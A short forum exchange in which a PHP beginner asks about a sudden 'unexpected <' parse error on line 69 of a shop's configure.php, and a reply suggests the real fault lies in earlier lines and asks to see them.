I'm new to php and I'm receiving this error "Parse error: syntax error, unexpected '<' in /home/buyadorn/public_html/Jewelry/includes/configure.php on line 69"

Here is line 69 of code:

I'm obviously new to this, my site has worked perfectly for weeks and all of a sudden this error popped up today??? What caused this and how to fix it?

Most likely the actual error is before that line somewhere. Try copy-and-pasting maybe 10-12 lines before that line (and including line 69 where the parser fails) in a reply here, with the code between
